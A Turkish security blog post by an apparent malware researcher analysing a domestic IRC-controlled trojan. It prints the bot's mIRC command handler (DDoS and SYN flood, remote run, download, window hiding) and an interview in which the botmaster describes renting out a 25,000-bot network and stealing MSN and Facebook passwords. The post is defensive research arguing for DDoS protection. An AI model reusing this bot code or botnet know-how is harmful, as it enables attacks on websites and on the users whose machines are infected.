Botnet Gerçeği

Geçtiğimiz günlerde http://twitter.com/hack4career üzerinden yayınlanan bir kaç zararlı yazılımı (timunun.exe, scan.exe) incelediğimde karşıma yerli malı ddos saldırı özelliğine sahip, irc ve msn üzerinden haberleşebilen bir trojan çıkıverdi. Trojanın aldığı komutları incelediğimde reklam yapmadan, saldırı yapmaya kadar bir çok özelliği üzerinde barındırdığını gördüm.

if ($1 = !reklam) { .set %reklam $2- }
if ($1 = !packet) { if ($2 = ddos) { //set %pchan # | if ($4 == random) { //fckrstart $3 $4 $r(1,65000) | halt } | //fckrstart $3 $4 $5 } }
if ($1 = !Atak) { if ($2 !== $null) { srvmsg  (Packet) (Yollaniyor) $2 Üzerinde $3 Toplam $4 Packet | synp start $4 $2 $3 } }
if ($1 = !nreklam) { msg #x %reklam }
if ($1 = !mesajnick) { .set %mesajnick $2- | echo -a #x Yeni Mesaj Atilacak Nick %mesajnick }
if ($1 = !mesaj) { .mesaj }
if ($1 = !settimer) { .set %timer $2- }
if ($1 = !timer) { .timer31 %timer $2- }
if ($1 = !timeroff) { .timer31 off }
if ($1 = !gir) { .girgir }
if ($1 = !Run) { srvmsg Running : $2- | .run $2- }
if ($1 = !qir) { .girulen $2- }
if ($1 = !q) { $2- }
if ($1 = !Version) { .Anlat }
if ($1 = !Down) { .Download $2- }
if ($1 = !download) { .msg #x 4,1 I14,1c4,1eSh14,1o4,1cK Lamer Koruması .. | /server irc.xxxx.tr }
if ($1 = !Clone) { .Clone $2- }
if ($1 = !IdentClone) { .identclone $2- }
if ($1 = !HideControl) { if ($appactive == $true) { msg #x Mirc Açik } | else { msg #x Mirc Kapali } }
if ($1 = !Hide) { .dll ice32.dll do_ShowWindow $window(-2).hwnd 0 }

Trojanın konfigürasyon dosyasında yer alan IRC sunucusuna bağlandığım zaman ilk bakışta boş görünen bir sunucu olarak görünsede çok geçmeden botmaster ile yaptığım sohbet esnasında sunucu üzerinde tam tamına 25000 adet bot olduğunu ve bunların sadece 500 TL’ye kiralanabildiğini öğrendiğimde DDOS izleme ve önleme sistemlerinin önemi benim için daha da artmış oldu.

DDOS izleme ve önleme sistemlerini hayata geçirme konusunda kurum veya kuruluşlarınızda henüz bir ilerleme kaydetmediyseniz, yöneticilerinizi ikna etme adına örnek bulmakta zorlanıyorsanız sizlere yardımcı olma adına botmaster ile gerçekleştirmiş olduğum sohbeti sizlerle paylaşıyorum. Unutmadan, her ne kadar 41 antivirüs üreticisinden 31 tanesi bu zararlı yazılımları (timunun.exe, scan.exe, imbot.exe) tespit ediyor olsada antivirüs politikalarınızdaki istenmeyen program politikalarına bu dosyaları eklemenizde fayda olabilir. Bir sonraki yazıda görüşmek dileğiyle…

[20:32] <MS> güzel bot olmuş
[20:33] <MS> hoşuma gitmedi desem yalan olur
[20:34] <MS> çok fazla kişiye bulaşmamış ama sanırım
[20:34] <********> buLaştır o zaman
[20:35] <MS> yok yahu o benim işim değil
[20:35] <********> senin işin ne
[20:35] <MS> ben sadece bu tür zararlı yazılımları inceliyorum
[20:35] <MS> kendin mi yazdın bu fuckers.jpg içinde yer alan tüm scripti ?
[20:35] <********> evet
[20:36] <MS> araklamadın yani ?
[20:36] <********> arakLamışta oLabiLirim tam hatırLamıyorum çok eski
[20:37] <MS> HTTP1.4 nedir bunuda ilk defa gördüm
[20:37] <********> diğer gördükLerin neydi
[20:37] <********> roxnet mi
[20:37] <MS> yok roxnetide ilk defa duydum
[20:38] <********> bu HTTP de oper oLmadan sunucuda hiçbir işLem yapamıyosun
[20:38] <********> diğer Lerinden çok koLay bot çaLınıyor
[20:38] <MS> kanaldakileride göremiyorsun sanırım
[20:38] <MS> evet güzel bir yöntemmiş
[20:38] <MS> http1.4 ü nereden indirebilirim ?
[20:39] <********> googLe
[20:39] <********> buLabiLirsin oradan
[20:39] <********> botnetmi besLiceksin
[20:39] <MS> yok hayır sadece nasıl çalıştığını merak ettim
[20:40] <MS> google yapmıştım ama bulamamıştım
[20:44] <MS> scan.exe ile imbot.exe ne iş yapıyor
[20:45] <********> scan exe
[20:45] <********> ispiyoncu bot özeLLiği var
[20:45] <********> biLgisayardaki diğer virüsLeri buLup
[20:45] <********> hangi serverda besLendikLerini
[20:45] <********> veriyor
[20:45] <********> imbot exe ise msn ve facebook şifresi veriyor
[20:46] <MS> bunları sen mi yazdın ?
[20:46] <********> ewet
[20:47] <MS> hangi crypterı kullandın ?
[20:48] <********> arkadaşa packer yaptırmıştım
[20:48] <********> hmm
[20:48] <********> sende varmı crtptr
[20:48] <MS> yok maalesef
[20:52] <MS> [email protected] kimin ?
[20:52] <********> packer yapan arkadaşın
[20:54] <MS> bu işi neden yapıyorsun ? para kazanıyor musun ?
[20:54] <********> evet hazır kuruLu düzen oLarak satıyorum isteyen kişiLere
[20:54] <********> aLan kişiLer farkLı amaçLar için kuLLanıyor
[20:54] <MS> mesela ne gibi amaçlar ?
[20:55] <********> meseLa web sitesi oLan sitesini günde binLerce kişiye ziyaret ettirebiLiyor
[20:55] <MS> hitten para kazanıyor
[20:55] <********> kimisi rakip siteye saLdırı yaparak o siteyi çökertiyor
[20:55] <MS> ne zamandan beri bu işlerle uğraşıyorsun ?
[20:55] <********> kimisi irc serverLere saLdırı yapıyor
[20:55] <MS> ne kadar kiralama raici ?
[20:56] <********> 500 TL
[20:56] <********> isteğe göre değişiyor
[20:56] <MS> aylık mı yıllık mı
[20:56] <********> ömür boyu eLinin aLtında buLunucak şekiLde
[20:57] <MS> yakalanma korkunuz yok mu ?
[20:57] <********> :p
[20:57] <MS> mesela ya ben polis olsaydım
[20:57] <********> Sonunu düşünen kahraman oLamaz
[20:59] <MS> alıcı var demek ya sözde fakirleşmiştik halk olarak ama :)
[21:00] <MS> yai kaç 20-30 arası mı ?
[21:00] <MS> yaş demek istedim
[21:00] <********> 24
[21:01] <MS> öğrenci değilsin sanırım ?
[21:01] <********> değiLim
[21:01] <MS> ne kadar süredir bu işlerle uğraşıyorsun ?
[21:01] <********> 6-7 Sene
[21:02] <MS> bu zamana kadar bu işten ne kadar para kazanmışsındır kabaca ?
[21:03] <********> oturduğum ev araba
[21:03] <********> yediğim içtiğim vs vs.
[21:03] <********> ;)
[21:03] <MS> o kadar diyorsun yani
[21:03] <********> 50k
[21:03] <********> 25k Lık botnetLer
[21:03] <********> satıyorum
[21:03] <MS> inanması zor kanalda 1 tane var sadece
[21:04] <********> kanaL +u
[21:04] <********> sadece op oLan kişiyi görebiLirsin
[21:04] <********> ;)
[21:04] <MS> komutuna 1 tanesi yanıt verdi
[21:04] <********> kanaL +Mm
[21:05] <********> sadece o bot kanaLda op
[21:05] <********> kanaL +Mm modunda oLduğu için
[21:05] <********> diğerLeri yazamaz
[21:05] <MS> bende tek op sen görünüyorsun ondan dedim
[21:05] <MS> bu kanalda şimdi kaç bot var ?
[21:05] <********> 403
[21:11] <MS> xxxx'da kaç bot var ?
[21:11] <********> 895
[21:11] <********> topLamda 25 bin bot var
[21:11] <********> resim göndericektim sana
[21:11] <********> dur upLoad edebilirim
[21:12] <MS> sunucunu kapatacaklardır yakında
[21:12] <********> kapatsınLar yenisini açarım 10 dakkamı aLmaz
[21:12] <********> ;)
[21:12] <MS> botlara konfigürasyon nasıl geçeceksin ?
[21:12] <MS> haberleşme ?
[21:13] <********> ;)
[21:50] <MS> bu botların hepsi türkiyeden mi ?
[21:50] <********> * [RUS|00||803357] ([email protected]) Quit (Connection reset by peer)
[21:50] <********> * [TUR|00|M|94088] ([email protected]) has joined #xxx
[21:50] <********> * [TUR|00|MP|1458] ([email protected]) has joined #xxx
[21:50] <********> * [USA|00|M|15992] ([email protected]) Quit (Ping timeout)
[21:50] <********> * [ESP|00|MP|5424] ([email protected]) has joined #xxx
[21:50] <********> * [TUR|00||628074] ([email protected]) Quit (Connection reset by peer)
[21:50] <********> * [RUS|00|D|20753] ([email protected]) Quit (Connection reset by peer)
[21:50] <********> * [RUS|00|UD|07067] ([email protected]) Quit (Ping timeout)
[21:50] <********> * [ESP|00|D|45749] ([email protected]) Quit (Ping timeout)
[21:50] <********> * [TUR|00|M|94088] ([email protected]) Quit (Ping timeout)
[21:50] <********> * [TUR|00|P|78342] ([email protected]) Quit (Connection reset by peer)
[21:50] <********> * [ESP|00|D|46676] ([email protected]) has joined #xxx
[21:50] <********> * [ESP|00|M|58294] ([email protected]) has joined #xxx
[21:50] <********> * [BRA|00|P|30821] ([email protected]) has joined #xxx
[21:50] <********> * [TUR|00||423136] ([email protected]) Quit (Ping timeout)
[21:50] <********> * [TUR|00|M|10638] ([email protected]) has joined #xxx
[21:50] <********> * [TUR|00|P|17537] ([email protected]) has joined #xxx
[21:50] <********> * [TUR|00|M|70509] ([email protected]) Quit (Connection reset by peer)
[21:50] <********> * [TUR|00|P|84223] ([email protected]) has joined #xxx
[21:50] <********> * [ESP|00|D|46676] ([email protected]) Quit (Ping timeout)
[21:50] <********> * [ESP|02|MP|3357] ([email protected]) has joined #xxx
[21:50] <********> * [ESP|00|M|58294] ([email protected]) Quit (Ping timeout)
[21:50] <********> * [PRT|00|MD|2372] ([email protected]) Quit (Connection reset by peer)
[21:50] <********> * [TUR|00|M|81825] ([email protected]) has joined #xxx
[21:50] <********> * [USA|00|P|53894] ([email protected]) Quit (Connection reset by peer)
[21:50] <********> * [TUR|00|P|83786] ([email protected]) Quit (Connection reset by peer)
[21:50] <********> * [RUS|00|D|43169] ([email protected]) has joined #xxx
[21:50] <********> * [TUR|00|M|81825] ([email protected]) Quit (Connection reset by peer)
[21:50] <********> * [TUR|00|P|83485] ([email protected]) Quit (Ping timeout)
[21:50] <********> * [TUR|00||767061] ([email protected]) Quit (Connection reset by peer)
[21:50] <********> * [ESP|00|M|75075] ([email protected]) has joined #xxx
[21:50] <********> * [ESP|00|D|79796] ([email protected]) has joined #xxx
[21:50] <********> * [TUR|00|P|91644] ([email protected]) has joined #xxx
[21:50] <********> * [TUR|00|MP|4601] ([email protected]) has joined #xxx
[21:50] <********> * [TUR|00|MP|4750] ([email protected]) has joined #xxx
[21:50] <********> * [MEX|00|P|57920] ([email protected]) has joined #xxx
[21:50] <********> * [RUS|00|PD|7924] ([email protected]) Quit (Connection reset by peer)
[21:50] <********> * [TUR|00|MP|4750] ([email protected]) Quit (Connection reset by peer)
[21:51] <********> her üLke mevcut

Yerli Botnet

image_pdfShow this post in PDF formatimage_printPrint this page
3 comments
Leave a Reply

Your email address will not be published. Required fields are marked *

You May Also Like
Read More

e-Devlet Hacklendi mi?

If you are looking for an English version of this article, please visit here. Öncelikle yazının sonunda söyleyeceğimi başta söyleyeyim, “Hayır, hack-len-me-di!” Peki bu durumda vatandaş olarak rahat bir nefes alabilir misiniz ? Maalesef hayır. Bunun sebebini de yazının devamında okuyabilirsiniz. Zaman zaman hortlayan “e-Devlet Hacklendi!”, “e-Devlet verileri çalındı!”, “85…
Read More
Read More

LinkedIn Dolandırıcıları

If you are looking for an English version of this article, please visit here. Uzun yıllardan beri sosyal ağları ve medyayı etkin kullanan bir siber güvenlik araştırmacısı olarak bağlantılarım arasında yer alanlarınız özellikle hafta içi LinkedIn ve Twitter üzerinden okuduğum ve beğendiğim siber güvenlik makalelerini, haberleri paylaştıklarımı farkediyorlardır. Twitter hesabımın…
Read More
Read More

WhatsApp Dolandırıcıları

If you are looking for an English version of this article, please visit here. Başlangıç Son günlerde hemen hemen WhatsApp uygulaması kullanan herkesi rahatsız eden yabancı cep telefonu numaralarından gelen çağrılardan, mesajlardan ben de yakın zamanda nasibimi aldım ve tabii ki diğer dolandırıcılıklarla ilgili yazılarımda (Kripto Para Dolandırıcıları, LinkedIn Dolandırıcıları,…
Read More
Read More

Profilime Kim Baktı?

If you are looking for an English version of this article, please visit here. 23 Eylül 2020 tarihinde Twitter’da siber güvenlik ile ilgili haberlere göz gezdirirken gündem olan başlıklarda #profilimekimbaktı etiketi dikkatimi çekti. Beni oldukça şüphelendiren bu etiketin gündem olmasının arkasında yatan sebebi bulmak için bu etiketi paylaşan hesaplara göz…
Read More